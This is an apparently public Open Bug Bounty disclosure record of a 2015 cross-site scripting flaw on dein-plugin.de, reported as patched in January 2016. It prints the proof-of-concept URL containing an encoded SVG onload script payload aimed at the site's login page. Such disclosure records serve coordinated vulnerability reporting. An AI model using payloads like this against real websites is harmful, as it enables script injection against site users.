dein-plugin.de XSS vulnerability

2015-12-02T13:33:00
ID OBB:111795
Type openbugbounty
Reporter Spam404
Modified 2015-12-02T13:36:00

Description

Vulnerable URL:
https://www.dein-plugin.de/dev/login.php?msg=Spam404&type;=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at 20.01.2016
Latest check for patch:| 20.01.2016 23:26 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 7171060
Google Pagerank| 0
VIP website status:| No
Check dein-plugin.de SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 2 December, 2015 13:33 GMT
Vulnerability existence verified and confirmed| 2 December, 2015 13:36 GMT